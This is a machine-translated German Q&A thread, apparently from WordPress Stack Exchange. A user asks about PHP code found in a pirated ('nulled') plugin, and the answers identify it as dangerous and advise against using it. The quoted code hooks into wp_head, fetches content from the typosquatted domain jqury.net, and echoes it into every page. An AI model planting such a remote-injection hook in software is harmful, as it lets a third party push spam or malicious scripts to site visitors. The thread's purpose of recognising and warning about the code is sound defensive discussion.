Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?

17

Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Sofia Rose
quelle
5
Welches Plugin ist das?
Daniel
Hast du das Plugin von der offiziellen WP-Seite bekommen?
Der Brasilianer
1
Dies war ein Plugin, das einer meiner Kunden wollte, dass ich in meinem Netzwerk installiere. Das Plugin wollte dies in wp-admin ausführen. Nachdem ich das gelesen hatte, fragte ich ihn, woher es komme. Es ist ein nulled Plugin von einem Torrent. Die kurze Antwort war erm NO xXx
Sofia Rose

Antworten:

16

Es wird ein Markup-Block geladen, der Spam enthält (ich habe überlegt, einen Teil des Quellcodes zu veröffentlichen, möchte aber keine Werbung für den Inhalt machen), und zwar von einer Domain, bei der es sich um einen Rechtschreibfehler der http://jquery.com/von jQuery verwendeten Domain handelt , eine seriöse und beliebte Javascript-Bibliothek und eine, die WordPress in den Core integriert. Ich denke, die Idee ist es, diese Bibliothek zu laden, obwohl etwas ganz anderes geladen wird.

Auf andere Weise wird versucht, jQuery zu laden. Beachten Sie den Variablennamen $jquery.

Möglicherweise wird auch versucht, schädliche Skripts zu laden. Ich habe nicht nachgesehen. Ich würde es auf jeden Fall als gefährlich bezeichnen, zumal sich der Inhalt dieser Seite jederzeit ändern kann, wenn der Domänencontroller dies wünscht.

Im besten Fall wird Ihre Website beschädigt, da Suchmaschinen auf Websites herabsehen, die Spam verbreiten.

Benutze es nicht. Es ist weder für Sie noch für andere im Internet von Vorteil, außer für die Personen, die die Site betreiben. Wenn Sie dies auf einer seriösen Website gefunden haben, melden Sie es ihnen.

s_ha_dum
quelle
7

Ja, es ist ein gefährlicher Code, der Inhalte von einer Spam-Site lädt.

Sie haben das Plugin nicht benannt, aber wenn Sie diesen Code gefunden haben, nachdem er auf Ihrer Website installiert wurde, ist es möglich, dass der Plugin-Code nicht so vom Entwickler stammt, sondern erst nach der Installation gehackt wurde. In diesem Fall finden Sie den schädlichen Code möglicherweise auf mehr Websites als nur in diesem Plugin.

Überprüfen Sie den heruntergeladenen Plugin-Code, von dem Sie das Plugin ursprünglich bezogen haben, und prüfen Sie, ob dieser schädliche Code ursprünglich vorhanden war. Wenn nicht, wurde Ihre Website gehackt. Wenn Sie dies feststellen, lesen Sie diesen Artikel aus dem Codex .

Ben Miller - Setzen Sie Monica wieder ein
quelle
3
Dies war ein Plugin, das einer meiner Kunden wollte, dass ich in meinem Netzwerk installiere. Das Plugin wollte dies in wp-admin ausführen. Nachdem ich das gelesen hatte, fragte ich ihn, woher es komme. Es ist ein nulled Plugin von einem Torrent. Die kurze Antwort war erm NO xXx
Sofia Rose
Durch die Nutzung unserer Website bestätigen Sie, dass Sie unsere Cookie-Richtlinie und Datenschutzrichtlinie gelesen und verstanden haben.
Licensed under cc by-sa 3.0 with attribution required.